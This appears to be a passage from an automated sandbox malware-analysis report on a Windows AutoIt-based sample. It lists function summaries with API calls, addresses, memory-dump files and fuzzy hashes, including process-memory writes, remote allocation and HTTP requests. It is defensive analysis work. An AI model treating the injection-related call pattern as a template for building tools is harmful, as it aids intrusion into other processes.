          APIs
          • __getptd.LIBCMT ref: 0041780F
            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
          • __getptd.LIBCMT ref: 00417826
          • __amsg_exit.LIBCMT ref: 00417834
          • __lock.LIBCMT ref: 00417844
          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
          • String ID:
          • API String ID: 938513278-0
          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
          APIs
            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
          • ___set_flsgetvalue.LIBCMT ref: 00413D20
            • Part of subcall function 004178AE: TlsGetValue.KERNEL32 ref: 004178B7
            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
            • Part of subcall function 0041788E: TlsGetValue.KERNEL32 ref: 0041789C
          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
          • ExitThread.KERNEL32 ref: 00413D4E
          • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00413D54
          • __freefls@4.LIBCMT ref: 00413D74
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
          • String ID:
          • API String ID: 2403457894-0
          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
          APIs
            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
          • ___set_flsgetvalue.LIBCMT ref: 004151C0
            • Part of subcall function 004178AE: TlsGetValue.KERNEL32 ref: 004178B7
            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
          • ___fls_getvalue@4.LIBCMT ref: 004151CB
            • Part of subcall function 0041788E: TlsGetValue.KERNEL32 ref: 0041789C
          • ___fls_setvalue@8.LIBCMT ref: 004151DD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
          • ExitThread.KERNEL32 ref: 004151ED
          • __freefls@4.LIBCMT ref: 00415209
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
          • String ID:
          • API String ID: 4247068974-0
          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
          Strings
          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
          • API String ID: 708495834-557222456
          • Opcode ID: f0126d56fc2507289e43e06e7929e5786c7bac06e63552a24b98fc31aa61fe74
          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
          • Opcode Fuzzy Hash: f0126d56fc2507289e43e06e7929e5786c7bac06e63552a24b98fc31aa61fe74
          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
          APIs
            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
          • CoInitialize.OLE32(00000000), ref: 00478442
          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
          • CoUninitialize.OLE32 ref: 0047863C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
          • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
          APIs
            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
          • String ID: @
          • API String ID: 4150878124-2766056989
          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
          APIs
          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
          • String ID:
          • API String ID: 3705125965-3916222277
          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$Delete$InfoItem
          • String ID: 0
          • API String ID: 135850232-4108050209
          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
          APIs
          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
          • SetWindowLongW.USER32 ref: 0045088E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Long
          • String ID: SysTreeView32
          • API String ID: 847901565-1698111956
          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
          APIs
          • LoadLibraryA.KERNEL32(?), ref: 00434B10
          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
          • FreeLibrary.KERNEL32(?), ref: 00434B9F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Library$AddressFreeLoadProc
          • String ID: AU3_GetPluginDetails
          • API String ID: 145871493-4132174516
          • Opcode ID: d60cff144c10e294cb7c95db37fd97d662616d2888c2a34723215d9fab7538fc
          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
          • Opcode Fuzzy Hash: d60cff144c10e294cb7c95db37fd97d662616d2888c2a34723215d9fab7538fc
          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
          APIs
          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$Window
          • String ID: SysMonthCal32
          • API String ID: 2326795674-1439706946
          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DestroyWindow
          • String ID: msctls_updown32
          • API String ID: 3375834691-2298589950
          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$DiskFreeSpace
          • String ID: \VH
          • API String ID: 1682464887-234962358
          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$DiskFreeSpace
          • String ID: \VH
          • API String ID: 1682464887-234962358
          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$DiskFreeSpace
          • String ID: \VH
          • API String ID: 1682464887-234962358
          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
          • GetVolumeInformationW.KERNEL32 ref: 0045D3F4
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$InformationVolume
          • String ID: \VH
          • API String ID: 2507767853-234962358
          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
